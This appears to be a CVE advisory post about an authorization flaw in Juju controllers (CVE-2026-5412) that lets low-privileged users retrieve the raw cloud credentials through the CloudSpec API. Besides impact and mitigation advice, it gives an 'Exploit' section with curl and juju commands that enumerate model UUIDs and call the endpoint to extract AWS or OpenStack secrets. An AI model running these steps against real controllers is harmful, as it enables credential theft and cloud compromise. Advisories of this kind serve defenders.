Listen to this Post
How CVE-2026-5412 Works
The vulnerability exists in the Juju Controller facade. An authenticated attacker with only basic login permissions—who also knows the target controller model’s UUID—can invoke the CloudSpec API method. This method is normally used by internal workers to maintain cloud connections and by the `juju kill-controller` CLI command. However, the API does not enforce any additional authorization checks beyond the initial login. Because of this, a low-privileged user can call CloudSpec and directly extract the raw cloud credentials (e.g., access keys, secrets) that were used to bootstrap the controller. The flaw stems from improper authorization (CWE-285) in the Controller facade, where the API endpoint fails to restrict sensitive credential access to superusers or model admins. This allows an authenticated but non-privileged user to escalate their access and compromise the underlying cloud infrastructure.
dailycve form
Platform: Juju
Version: 2.9.0–2.9.56, 3.6.0–3.6.20
Vulnerability: Cloud credential leak
Severity: Critical
date: 2026-04-10
Prediction: 2026-04-17 (estimated patch)
Analytics under heading What Undercode Say:
Check current Juju version
juju version
List all controller models to find UUIDs
juju models --format yaml | grep "uuid:"
Simulate a low-privileged user exploiting the vulnerability
(requires login permission and known model UUID)
curl -X POST https://<controller-ip>:17070/CloudSpec \
-H "Authorization: Bearer <low-privilege-token>" \
-d '{"model-uuid": "<known-uuid>"}'
Exploit:
Attacker with low privileges:
1. Authenticate to the Juju controller
juju login -u attacker -p password
2. Enumerate models (if possible) or guess a model UUID
juju models
3. Call the CloudSpec API directly using curl or a custom script
curl -k -X POST https://controller-ip:17070/CloudSpec \
-H "Content-Type: application/json" \
-d '{"model-uuid": "xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx"}' \
--cert attacker.crt --key attacker.key
4. Extract cloud credentials (e.g., AWS access keys, OpenStack secrets) from the response
Protection from this CVE
- Restrict network ingress to port 17070 on all controller machines (VM) or the controller service (K8s) using firewall rules or network policies.
- Monitor logs for unauthorized access attempts to the CloudSpec API endpoint.
- Apply the vendor patch as soon as it is released (expected in versions 2.9.57 and 3.6.21).
- Enforce principle of least privilege: ensure only superusers and model admins have login permissions.
Impact
An authenticated low-privileged user can obtain the raw cloud credentials used to bootstrap the Juju controller. This leads to full compromise of the underlying cloud infrastructure (e.g., AWS, Azure, GCP, OpenStack), allowing the attacker to provision, modify, or destroy cloud resources, exfiltrate sensitive data, and potentially pivot to other connected systems. The confidentiality, integrity, and availability of both the Juju environment and the managed cloud services are critically affected (CVSS 9.9).
🎯Let’s Practice Exploiting & Learn Patching For Free:
Sources:
Reported By: github.com
Extra Source Hub:
Undercode

